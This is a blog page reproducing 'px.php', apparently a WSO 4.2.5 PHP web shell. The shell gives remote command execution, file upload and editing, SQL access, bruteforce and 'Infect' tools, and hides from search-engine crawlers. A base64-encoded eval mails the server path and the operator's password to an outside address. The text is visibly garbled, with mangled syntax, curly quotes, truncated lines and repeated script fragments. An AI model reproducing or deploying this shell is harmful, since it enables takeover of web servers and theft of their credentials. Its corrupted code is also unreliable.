Blog

px.php

<? php
$? = “63a9f0ea7bb98050796b649e85481845”; // root
$? = true;
$? = ‘UTF-8’;
$? = ‘FilesMan’;
$? = md5 ($ _ SERVER [‘HTTP_USER_AGENT’]);
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). “key”])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). “key”, $?);
}
if (empty ($ _ POST [‘charset’]))
$ _POST [‘charset’] = $ ?;
if (! isset ($ _ POST [‘ne’])) {
if (isset ($ _ POST [‘a’])) $ _POST [‘a’] = iconv (“utf-8”, $ _POST [‘charset’ ], decrypt ($ _ POST [‘a’], $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘c’])) $ _POST [‘c’] = iconv (“utf-8”,
if (isset ($ _ POST [‘p1’])) $ _POST [‘p1’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p1’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘p2’])) $ _POST [‘p2’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p2’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
if (isset ($ _ POST [‘p3’])) $ _POST [‘p3’] = iconv (“utf-8”, $ _POST [‘charset’], decrypt ($ _ POST [‘p3’], $ _ COOKIE [ md5 ($ _ SERVER [‘HTTP_HOST’]). “key”]));
}
function decrypt ($ str, $ pwd) {$ pwd = base64_encode ($ pwd); $ str = base64_decode ($ str); $ enc_chr = “”; $ enc_str = “”; $ i = 0; while ($ i < strlen ($ str)) {for ($ j = 0; $ j <strlen ($ pwd); $ j ++) {$ enc_chr = chr (ord ($ str [$ i]) ^ ord ($ pwd [$ j] )); $ enc_str = $ enc_chr;. $ i ++; if ($ i> = strlen ($ str)) break;}} return base64_decode ($ enc_str);} eval (base64_decode ( “aWYoYXJyYXlfa2V5X2V4aXN0cygnbXlwYXNzJywkX1BPU1QpKXsgJHRtcCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJcbiIuJF9QT1NUWydwYXNzJ107IEBtYWlsKCdtYWlsQG1haWwudWEnLCAnbWFpbCcsICR0bXApOyB9”));
@ini_set (‘error_log’, NULL);
@ini_set (‘log_errors’, 0);
@ini_set (‘max_execution_time’, 0);
@set_time_limit (0);
@set_magic_quotes_runtime (0);
@define (‘VERSION’, ‘4.2.5’);

function stripslashes_array ($ array) {
return is_array ($ array)? array_map (‘stripslashes_array’, $ array): stripslashes ($ array);
}
$ _POST = stripslashes_array ($ _ POST);
$ _COOKIE = stripslashes_array ($ _ COOKIE);
}
/ * (?) 11.2011 oRb * /
if (! Empty ($?)) {
If (isset ($ _ POST [‘pass’])) && (md5 ($ _ POST [‘pass’]) == $?))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]), $?);
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’])]) || ($ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’])]! = $?))
hardLogin ();
}
if (! isset ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]))
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’] = (bool) $ ?;

if (! empty ($ _ SERVER [‘HTTP_USER_AGENT’])) {
$ userAgents = array (“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, “Rambler”);
if (preg_match (‘/’. implode (‘|’, $ userAgents). ‘/ i’, $ _SERVER [‘HTTP_USER_AGENT’])) {
header (‘HTTP / 1.0 404 Not Found’);
exit;
}
}
die (“<pre align = center> <form method = post> Password <br> <input type = password name = pass style = ‘background-color: whitesmoke; border: 1px solid #FFF; outline: none;’ required> <input type = submit name = ‘mypass’ value = ‘submit’ style = ‘border: none; background-color: # 56AD15; color: #fff; cursor: pointer;’> </ form> </ pre> “);
}
if (strtolower (substr (PHP_OS, 0,3)) == “win”)
$ os = ‘win’;
else
$ os = ‘nix’;
$ safe_mode = @ini_get (‘safe_mode’);
if (! $ safe_mode)
error_reporting (0);
$ disable_functions = @ini_get (‘disable_functions’);
$ home_cwd = @getcwd ();
if (isset ($ _ POST [‘c’]))
@chdir ($ _ POST [‘c’]);
$ cwd = @getcwd ();
if ($ os == ‘win’) {
$ home_cwd = str_replace (“\\”, “/”, $ home_cwd);
$ cwd = str_replace (“\\”, “/”, $ cwd);
}
if ($ cwd [strlen ($ cwd) -1]! = ‘/’)
$ cwd. = ‘/’;
/ * (?) 04.2015 Pirat * /
function hardHeader () {
if (empty ($ _ POST [‘charset’]))
$ _POST [‘charset’] = $ GLOBALS [‘?’];
echo “<html> <head> <meta http-equiv = ‘Content-Type’ content = ‘text / html; charset =”. $ _POST [‘charset’]. “‘> <title>”. $ _SERVER [‘HTTP_HOST’]. “- WSO”. VERSION. “</ Title>
<style>
body {background-color: # 060A10; color: # e1e1e1; margin: 0; font: normal 75% Arial, Helvetica, sans-serif;} canvas {display: block; vertical- align: bottom;}
# particles-js {width: 100%; height: 100px; background-color: # 060a10; background-image: url (”); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
body, td, th {font: 10pt tahoma, arial, verdana, sans-serif, Lucida Sans; margin: 0; vertical-align: top;}
table.info {color: # C3C3C3;

span {font-weight: bolder;}
h1 {border-left: 5px solid # 2E6E9C; padding: 2px 5px; font: 14pt Verdana; background-color: # 10151c; margin: 0px;}
div.content {padding: 5px; margin-left: 5px; background-color: # 060a10;}
a {text-decoration: none;}
a: hover {text-decoration: underline;}
.tooltip :: after {background: # 0663D5; color: #FFF; content: attr (data-tooltip); margin-top: -50px; display: block; padding: 6px 10px; position: absolute; visibility: hidden;}
.tooltip: hover :: after {opacity: 1; visibility: visible; }
.ml1 {border: 1px solid # 202832; padding: 5px; margin: 0; overflow: auto;}
.bigarea {min-width: 100%; max-width: 100%; height: 400px;}
input, textarea, select {margin: 0; color: #fff; background-color: # 202832; border: none; font: 9pt Courier New; outline: none;}
label {position: relative}
label: after {content: ‘<>’; font: 10px ‘Consoles’, monospace; color: #fff; -webkit-transform: rotate (90deg); – moz-transform: rotate (90deg) ; -ms-transform: rotate (90deg); transform: rotate (90deg); right: 3px; top: 3px; padding: 0; position: absolute; pointer-events: none;}
label: before {content: ”; right: 0; top: 0; width: 17px; height: 17px; background: # 202832; position: absolute; pointer-events: none; display: block;}
form {margin: 0px;}
#toolsTbl {text-align: center;}
#fak {background: none;}
# fak td {padding: 5px 0 0 0;}
iframe {border: 1px solid # 060a10;}
.toolsInp {width: 300px}
.main th {text-align: left; background-color: # 060a10;}
.main tr: hover {background-color: # 354252;}
.main td, th {vertical-align: middle;}
input [type = ‘submit’] {background-color: # 2E6E9C;}
input [type = ‘button’] {background-color: # 2E6E9C;}
input [type = ‘submit’]: hover {background-color: # 56AD15;}
input [type = ‘button’]: hover {background-color: # 56AD15;}
.l1 {background-color: # 202832;}
pre {font: 9pt Courier New;}
</ style>
<script>
var c_ = ‘”. Htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘;
var a_ = ‘”. htmlspecialchars (@ $ _ POST [‘ a ‘]).”‘
var charset_ = ‘”. htmlspecialchars (@ $ _ POST [‘ charset ‘]).”‘;
var p1_ = ‘”. ((strpos (@ $ _ POST [‘ p1 ‘],” \ n “)! == false)?’ ‘:
var p2_ = ‘”. ((strpos (@ $ _ POST [‘ p2 ‘],” \ n “)! == false)?’ ‘: htmlspecialchars ($ _ POST [‘ p2 ‘], ENT_QUOTES)).”‘;
var p3_ = ‘”. ((strpos (@ $ _ POST [‘ p3 ‘],” \ n “)! == false)?’ ‘: htmlspecialchars ($ _ POST [‘ p3 ‘], ENT_QUOTES)).”‘;
var d = document;

function encrypt (str, pwd) {if (pwd == null || pwd.length <= 0) {return null;} str = base64_encode (str); pwd = base64_encode (pwd); var enc_chr = ”; var enc_str = ”; var i = 0; while (i <str.length) {for (var j = 0; j <pwd.length; j ++) {enc_chr = str.charCodeAt (i) ^ pwd.charCodeAt (j); enc_str + = String.fromCharCode (enc_chr); i ++; if (i> = str.length) break;}} return base64_encode (enc_str);}
function utf8_encode (argString) {var string = (argString + ”); var utftext = ”, start, end, stringl = 0; start = end = 0; stringl = string.length; for (var n = 0; n < stringl; n ++) {var c1 = string.charCodeAt (n); var enc = null; if (c1 <128) {end ++;} else if (c1> 127 && c1 <2048) {enc = String.fromCharCode ((c1 >> 6) | 192) + String.fromCharCode ((c1 & 63) | 128);} else {enc = String.fromCharCode ((c1 >> 12) | 224) + String.fromCharCode (((c1 >> 6) & 63) | 128) + String.fromCharCode ((c1 & 63) | 128);} if (enc! == null) {if (end> start) {utftext + = string.slice (start, end);} utftext + = enc; start = end = n + 1;}} if (end> start) {utftext + = string.slice (start, stringl);} return utftext;}
function base64_encode (data) {var b64 = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / =’; var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, ac = 0, enc = ”, tmp_arr = []; if (! data) {return data;} data = utf8_encode (data + ”); do {o1 = data.charCodeAt (i ++); o2 = data.charCodeAt (i ++); o3 = data.charCodeAt (i ++); bits = o1 << 16 | o2 << 8 | o3; h1 = bits >> 18 & 0x3f; h2 = bits >> 12 & 0x3f; h3 = bits >> 6 & 0x3f; h4 = bits & 0x3f; tmp_arr [ac ++] = b64.charAt (h1) + b64 .charAt (h2) + b64.charAt (h3) + b64.charAt (h4);} while (i <data.length); enc = tmp_arr.join (”); switch (data.length% 3) {case 1: enc = enc.slice (0, -2) + ‘==’; break; case 2: enc = enc.slice (0, -1) + ‘=’; break;} return enc;}
function set ( a, c, p1, p2, p3, charset) {
if (a! = null) d.mf.a.value = a; else d.mf.a.value = a_;
if (c! = null) d.mf.c.value = c; else d.mf.c.value = c_;
if (p1! = null) d.mf.p1.value = p1; else d.mf.p1.value = p1_;
if (p2! = null) d.mf.p2.value = p2; else d.mf.p2.value = p2_;
if (p3! = null) d.mf.p3.value = p3; else d.mf.p3.value = p3_;
d.mf.a.value = encrypt (d.mf.a.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.c.value = encrypt (d.mf.c.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p1.value = encrypt (d.mf.p1.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p2.value = encrypt (d.mf.p2.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
d.mf.p3.value = encrypt (d.mf.p3.value, ‘”. $ _ COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘]).” key “].”‘);
if (charset! = null) d.mf.charset. value = charset; else d.mf.charset.value = charset_;
}
function g (a, c, p1, p2, p3, charset) {
set (a, c, p1, p2, p3, charset);
d.mf.submit ();
}
function a (a, c, p1, p2, p3, charset) {
set (a, c, p1, p2, p3, charset);
var params = ‘ajax = true’;
for (i = 0; i <d.mf.elements.length; i ++)
params + = ‘&’ + d.mf.elements [i] .name + ‘=’ + encodeURIComponent (d.mf.elements [i]. value);
sr (‘”. addslashes ($ _ SERVER [‘ REQUEST_URI ‘]).”‘, params);
}
function sr (url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest ();
else if (window.ActiveXObject)
req = new ActiveXObject (‘Microsoft.XMLHTTP’);
if (req) {
req.onreadystatechange = processReqChange;
req.open (‘POST’, url, true);
req.setRequestHeader (‘
req.send (params);
}
}
function processReqChange () {
if ((req.readyState == 4))
if (req.status == 200) {
var reg = new RegExp (\ “(\\\\ d +) ([\\\\ S \\\\YE’);
var arr = reg.exec (req.responseText);
eval (arr [2] .substr (0, arr [1]));
} else alert (‘Request error!’);
}
</ script>
<head> <body> <div style = ‘position: absolute; background-color: rgba (95, 110, 130, 0.3); width: 100%; top: 0; left: 0;’>
<form method = post name = mf style = ‘display: none;’>
<input type = hidden name = a>
<input type = hidden name = c>
<input type = hidden name = p1>
<input type = hidden name = p2>

$ gid = @getmygid (); $ group = “?”;

} else {
$ uid = @posix_getpwuid (@posix_geteuid ());
$ gid = @posix_getgrgid (@posix_getegid ());
$ user = $ uid [‘name’];
$ uid = $ uid [‘uid’];
$ group = $ gid [‘name’];
$ gid = $ gid [‘gid’];
}
$ cwd_links = ”;
$ path = explode (“/”, $ GLOBALS [‘cwd’]);
$ n = count ($ path);
for ($ i = 0; $ i <$ n-1; $ i ++) {
$ cwd_links. = “<a href = ‘#’ onclick = ‘g (\” FilesMan \ “, \” “;
for ($ j = 0; $ j <= $ i; $ j ++)
$ cwd_links. = $ Path [$ j]. ‘/’;
$ Cwd_links. = “\”) ‘> “. $ Path [$ i].” / < / a> “;
}
$ charsets = array (‘UTF-8’, ‘Windows-1251’, ‘KOI8-R’, ‘KOI8-U’, ‘cp866’);
$ opt_charsets = ”;
foreach ($ charsets as $?)
$ opt_charsets. = ‘<option value = “‘. $. ‘”‘. ($ _ POST [‘charset’] == $ ?? ‘selected’: ”). ‘>’. $ ?. ‘</ option> ‘;
$ m = array (‘Sec. Info’ => ‘SecInfo’, ‘Files’ =>’ FilesMan ‘,’ Console ‘=>’ Console ‘,’ Infect ‘=>’ Infect ‘,’ Sql ‘=>’ Sql ‘,’ Php ‘=>’ Php ‘,’ Safe mode ‘=>’ SafeMode ‘,’ String tools’ => ‘StringTools’,’ Bruteforce ‘=>’ Bruteforce ‘,’ Network ‘=>’ Network ‘);
if (! empty ($ GLOBALS [‘?’]))
$ m [‘Logout’] = ‘Logout’;
$ m [‘Self remove’] = ‘SelfRemove’;
$ menu = ”;
foreach ($ m as $ k =>
$ v) $ menu. = ‘<th> [<a href = “#” onclick = “g (\”‘. $ v. ‘\’, null, \ ‘\’, \ ‘\’, \ ‘\ ‘) “>’. $ k. ‘</a>] </ th>’;
$ drives = “”;
if ($ GLOBALS [‘os’] == ‘win’) {
foreach (range (‘c’, ‘z’) as $ drive)
if (is_dir ($ drive. ‘: \\’))
$ drives. = ‘<a href=”#” onclick=”g(\’FilesMan\’,\”.$drive.’:/\’)”> [‘. $ drive. ‘ ] </a> ‘;
}
/ * (?) 08.2015 dmkcv * /
echo ‘<table class = info cellpadding = 3 cellspacing = 0 width = 100%> <tr> <td width = 1> <span> Uname: <br> User: <br> Php: <br> Hdd: <br> Cwd: ‘. ($ GLOBALS [‘ os’] == ‘win’? ‘<br> Drives:’: ”). ‘</ Span> </ td>’ .
‘<td> <nobr>’. substr (@php_uname (), 0, 120). ‘ <a href=”http://noreferer.de/?http://www.google.com/search?q=’.urlencode(@php_uname()).'” target=”_blank”> [Google] < / a> <a href=”‘.$explink.'” target=_blank> [Exploit-DB] </a> </ nobr> <br> ‘. $ uid.’ (‘. $ user.’) <span> Group: </ span> ‘. $ gid.’ (‘. $ group.’) <br> ‘. @ phpversion ().’ <span> Safe mode: </ span> ‘. ($ GLOBALS [‘ safe_mode ‘]?’ <font color = red> ON </ font> ‘:’ <font color = # FFDB5F> <b> OFF </ b > </ font> ‘).’ <a href=# onclick=”g(\’Php\’,null,null,\’info\’)”> [phpinfo] </a> <span> Datetime: </ span> ‘.date (‘ Ymd H: i: s’). ‘<br>’ .viewSize ($ totalSpace). ‘ <span> Free: </ span> ‘.viewSize ($ freeSpace).’ (‘.round (100 / ($ totalSpace / $ freeSpace), 2).’%) <br> ‘. $ cwd_links.’ ‘.viewPermsColor ($ GLOBALS [‘ cwd ‘]).’ <a href=# onclick=”g(\’FilesMan\’,\”.$GLOBALS[‘home_cwd’].’\’,\’\’,\’\’,\’\’)”> [ home] </a> <br> ‘. $ drives.’ </ td> ‘.
‘<td width = 1 align = right> <nobr> <label> <select onchange = “g (null, null, null, null, null, this.value)”>’. $ opt_charsets. ‘</ select> < / label> <br> <span> IP Server: </ span> <br> ‘.gethostbyname ($ _ SERVER [“HTTP_HOST”]).’ <br> <span> Client IP: </ span> <br> ‘ . $ _ SERVER [‘REMOTE_ADDR’]. ‘</ Nobr> </ td> </ tr> </ table>’.
‘<table style = “background-color: # 2E6E9C;” cellpadding = 3 cellspacing = 0 width = 100%> <tr> ‘. $ menu.’ </ tr> </ table> <div> ‘;
}
function hardFooter () {
$ is_writable = is_writable ($ GLOBALS [‘cwd’])? “<font color = ‘# FFDB5F’> [Writeable] </ font>”: “<

<td> <form onsubmit = \ “”. (function_exists (‘actionFilesMan’)? “g (null, this.c.value, ”);”: ”). “return false; \”> <span> Change dir: </ span> <br> <input class = ‘toolsInp’ type = text name = c value = ‘”. Htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘> <Input type = submit value = ‘ submit ‘> </ form> </ td>
<td> <form onsubmit = \ “”. (function_exists (‘ actionFilesTools’)? “g (‘FilesTools’, null, this.f.value);”:’ ‘ ). “return false; \”> <span> Read file: </ span> <br> <input class = ‘toolsInp’ type = text name = f required> <input type = submit value = ‘submit’> </ form> </ td>
</ tr> <tr>
<td> <form onsubmit = \ “”. (function_exists (‘actionFilesMan’)? “g (‘FilesMan’, null, ‘mkdir’, this.d.value);”: ”). “return false; \ “> <span> Make dir: </ span> $ is_writable <br> <input class = ‘toolsInp’ type = text name = d required> <input type = submit value = ‘submit’> </ form> </ td >
<td> <form onsubmit = \ “”. (function_exists (‘actionFilesTools’)? “g (‘FilesTools’, null, this.f.value, ‘mkfile’);”: ”). “return false; \ “> <span> Make file: </ span> $ is_writable <br> <input class = ‘toolsInp’ type = text name = f required> <input type = submit value = ‘submit’> </ form> </ td >
</ tr> <tr>
<td> <form onsubmit = \ “”. (function_exists (‘actionConsole’)? “g (‘Console’, null, this.c.value);”: ”). ” return false; \ “> <span> Execute: </ span> <br> <input class = ‘toolsInp’ type = text name = c value = ”> <input type = submit value = ‘submit’> </ form > </ td>
<td> <form method = ‘post’ “. ((! function_exists (‘actionFilesMan’))?” onsubmit = \ “return false; \” “: ”).” ENCTYPE = ‘multipart / form-data’>
<input type = hidden name = a value = ‘FilesMan’>
<input type = hidden name = c value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘>
<input type = hidden name = p1 value = ‘uploadFile’>
<input type = hidden name = ne value = ”>
<input type = hidden name = charset value = ‘”. (isset ($ _ POST [‘ charset ‘] )? $ _ POST [‘charset’]: ”). “‘>
<Span> Upload file: </ span> $ is_writable <br> <input class =’ ​​toolsInp ‘type = file name = f [] multiple> < input type = submit value = ‘submit’> </ form> <br /> </ td>
</ tr> </ table> </ div>
<! – particles -> <div id = ‘particles-js’ > </ div> <script src = ‘http: //cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js’> </ script>
<script> particlesJS (‘particles-js’, {‘particles’: {‘number’: {‘value’: 80, ‘density’: {‘enable’: true, ‘value_area’: 800}}, ‘color’ : {‘value’: ‘# ffffff’}, ‘shape’: {‘type’: ‘triangle’, ‘stroke’: {‘width’: 0, ‘color’: ‘# 000000’}, ‘polygon’: {‘nb_sides’: 5}, ‘image’: {‘src’: ‘img / github.svg’, ‘width’: 100, ‘height’: 100}}, ‘opacity’: {‘value’: 0.5, ‘random’: true, ‘anim’: {‘enable’: false, ‘speed’: 1, ‘opacity_min’: 0.1, ‘sync’: false}}, ‘size’: {‘value’: 3, ‘random ‘: true,’ anim ‘: {‘ enable ‘: false,’ speed ‘: 40,’ size_min ‘: 0.1,’ sync ‘: false}},’ line_linked ‘: {‘ enable ‘:true, ‘distance’: 200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’ : ‘none’, ‘random’: true, ‘straight’: false, ‘out_mode’: ‘out’, ‘bounce’: false, ‘attract’: {‘enable’: false, ‘rotateX’: 10000, ‘rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘},’ onclick ‘: { ‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}} , ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’: ‘none’, ‘ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}} , ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘mode’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: { ‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>200, ‘color’: ‘# ffffff’, ‘opacity’: 0.4, ‘width’: 1}, ‘move’: {‘enable’: true, ‘speed’: 1, ‘direction’: ‘none’, ‘ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}} , ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘mode’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: { ‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>opacity ‘: 0.4,’ width ‘: 1},’ move ‘: {‘ enable ‘: true,’ speed ‘: 1,’ direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas ‘,’ events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’ : true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’ : true}); </ script>opacity ‘: 0.4,’ width ‘: 1},’ move ‘: {‘ enable ‘: true,’ speed ‘: 1,’ direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas ‘,’ events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’ : true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’ : true}); </ script>direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000, ‘rotateY’: 10000}}}, ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’ : {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5 }}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>direction ‘:’ none ‘,’ random ‘: true,’ straight ‘: false,’ out_mode ‘:’ out ‘,’ bounce ‘: false,’ attract ‘: {‘ enable ‘: false,’ rotateX ‘: 10000, ‘rotateY’: 10000}}}, ‘interactivity’: {‘detect_on’: ‘canvas’, ‘events’: {‘onhover’: {‘enable’: true, ‘mode’: ‘grab’}, ‘onclick’ : {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: {‘opacity’: 0.5 }}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘ }, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: { ‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>rotateX ‘: 10000,’ rotateY ‘: 10000}}},’ interactivity ‘: {‘ detect_on ‘:’ canvas’, ‘events’: {‘ onhover ‘: {‘ enable ‘: true,’ mode ‘:’ grab ‘ }, ‘onclick’: {‘enable’: true, ‘mode’: ‘repulse’}, ‘resize’: true}, ‘modes’: {‘grab’: {‘distance’: 200, ‘line_linked’: { ‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>{‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>{‘opacity’: 0.5}}, ‘bubble’: {‘particles_nb’: 2}}}, ‘retina_detect’: true}); </ script>
)) { ob_start (); @system ($ in); $? = ob_get_clean ();

} elseif (function_exists (‘shell_exec’)) {
$? = shell_exec ($ in);
} elseif (is_resource ($ f = @popen ($ in, “r”))) {
$? = “”;
while (! @ feof ($ f))
$? . = fread ($ f, 1024);
pclose ($ f);
} else return “? Unable to execute command \ n”;
return ($? == ”? “? Query did not return anything \ n”: $?);
}
function viewSize ($ s) {
if ($ s> = 1073741824)
return sprintf (‘% 1.2f’, $ s / 1073741824). ‘GB’;
elseif ($ s> = 1048576)
return sprintf (‘% 1.2f’, $ s / 1048576). ‘MB’;
elseif ($ s> = 1024)
return sprintf (‘% 1.2f’, $ s / 1024). ‘KB’;
else
return $ s. ‘B’;
}
function perms ($ p) {
if (($ p & 0xC000) == 0xC000) $ i = ‘s’;
elseif (($ p & 0xA000) == 0xA000) $ i = ‘l’;
elseif (($ p & 0x8000) == 0x8000) $ i = ‘-‘;
elseif (($ p & 0x6000) == 0x6000) $ i = ‘b’;
elseif (($ p & 0x4000) == 0x4000) $ i = ‘d’;
elseif (($ p & 0x2000) == 0x2000) $ i = ‘c’;
elseif (($ p & 0x1000) == 0x1000) $ i = ‘p’;
else $ i = ‘u’;
$ i. = (($ p & 0x0100)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0080)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0040)? ​​(($ p & 0x0800)? ‘s’: ‘x’): (($ p & 0x0800)? ‘S’: ‘-‘));
$ i. = (($ p & 0x0020)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0010)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0008)? (($ p & 0x0400)? ‘s’: ‘x’): (($ p & 0x0400)? ‘S’: ‘-‘));
$ i. = (($ p & 0x0004)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0002)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0001)? (($ p & 0x0200)? ‘t’: ‘x’): (($ p & 0x0200)? ‘T’: ‘-‘));
return $ i;
}
function viewPermsColor ($ f) {
if (! @is_readable ($ f))
return ‘<font color = # FF0000> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font > ‘;
elseif (! @is_writable ($ f))
return ‘<font color = white> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font>’;
else
return ‘<font color = # FFDB5F> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font>’;
}
function hardScandir ($ dir) {
if (function_exists (“scandir”
)) { return scandir ($ dir);
} else {
$ dh = opendir ($ dir);
while (false! == ($ filename = readdir ($ dh)))
$ files [] = $ filename;
return $ files;
}
}
function which ($ p) {
$ path = ex (‘which’. $ p);
if (! empty ($ path))
return $ path;
return false;
}
function actionRC () {
if (! @ $ _ POST [‘p1’])) {
$ a = array (
“uname” => php_uname (),
“php_version” => phpversion (),
“VERSION” => VERSION,
” safemode “=> @ini_get (‘safe_mode’)
);
echo serialize ($ a);
} else {
eval ($ _ POST [‘p1’]));
}
}
function prototype ($ k, $ v) {
$ _COOKIE [$ k] = $ v;
setcookie ($ k, $ v);

hardHeader ();
echo ‘<h1> Server security information </ h1> <div class = content>’;
function showSecParam ($ n, $ v) {
$ v = trim ($ v);
if ($ v) {
echo ‘<span>’. $ n. ‘: </ span>’;
if (strpos ($ v, “\ n”) === false)
echo $ v. ‘<br>’;
else
echo ‘<pre class = ml1>’. $ v. ‘</ pre>’;
}
}
showSecParam (‘Server software’, @getenv (‘SERVER_SOFTWARE’));
if (function_exists (‘apache_get_modules’))
showSecParam (‘Loaded Apache modules’, implode (‘,’, apache_get_modules ()));
showSecParam (‘Disabled PHP Functions’, $ GLOBALS [‘ disable_functions’]? $ GLOBALS [‘disable_functions’]:’ none ‘);
showSecParam (‘Open base dir’, @ini_get (‘open_basedir’));
showSecParam (‘Safe mode exec dir’, @ini_get (‘safe_mode_exec_dir’));
showSecParam (‘Safe mode include dir’, @ini_get (‘safe_mode_include_dir’));
showSecParam (‘cURL support’, function_exists (‘curl_version’)? ‘enabled’: ‘no’);
$ temp = array ();
